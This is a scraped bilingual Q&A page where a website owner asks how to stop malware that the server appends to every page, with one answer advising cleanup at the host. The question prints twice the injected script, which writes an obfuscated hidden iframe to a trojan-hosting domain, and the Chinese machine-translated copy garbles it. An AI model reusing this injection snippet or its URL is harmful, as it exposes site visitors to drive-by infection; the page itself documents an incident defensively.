在html / javascript / css中编程停止一个特定的代码块 [英] Programatically stopping a specific chunk of code in html/javascript/css
问题描述
其上有我的网站的服务器上也有病毒。
病毒注入了恶意代码
< b id =BAs>< / b>< script> / *警告:Opera Only * / var hKo = document.createElement(script ); hKo.text =document.write(unescape(\%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70 %3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e %70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b %appendChild(hKo)< / script>< / script>< / script>
到每个提供的单一页面上,并且它正在由Apache或类似的东西进行预处理到文件结尾。
我创建了一个测试文件,其中包含以下代码:
< html>
< head>
< title>测试HTML文件< / title>
< / head>
< body>
< h1>测试HTML文件< / h1>
< / body>
< / html>
这不漂亮,但它的用途。
在浏览器中查看页面时,我会收到
< html>
< head>
< title>测试HTML文件< / title>
< / head>
< body>
< h1>测试HTML文件< / h1>
< b id =BAs>< / b>< script> / * Warning:Opera Only * / var hKo = document.createElement(script); hKo.text =document。写入(unescape(\%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e% 63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68% 20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e% 69.30%66%72%61%6d%65%3e \));; document.getElementById(BAs)appendChild(hKo)< / script>
< / body>
< / html>
可以从www.sagamountain.com/testfile.html查看(警告, )
我需要以编程方式停止该div和该脚本的执行,因为它是一个iframe的网站上有一个木马。 HTML,CSS或JS,我只是需要一些方法来阻止JS执行。
它已经显示:none所以你看不到它,但我怎么能阻止iframe永远加载?
感谢您的帮助! unescape事件解析为iframe,以 http://ncccnnnc.cn/img/index.php这显然是我的烦恼的根源。不要去该网站!
编辑:这是对 http://serverfault.com/questions/78439/my-website-is-
很抱歉,我无法回答您的具体问题,但我认为您正在看这个错误的方式。你需要做的是不是删除病毒插入的html,你需要做的是谈到你的web主机/ sysadmin并清除病毒。
治疗症状不会治愈感染。 治疗疾病,但也将治疗症状以及消除病毒。
The server that has my website on it also has a virus on it.
The virus injects the malicious code
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.
I created a test file, with the following code:
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
</body>
</html>
It isn't pretty, but it served its purpose.
When viewing the page in my browser, I get
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
</body>
</html>
which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)
I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.
It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?
Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!
EDIT: This is a followup to http://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459
I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.
Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.
这篇关于在html / javascript / css中编程停止一个特定的代码块的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!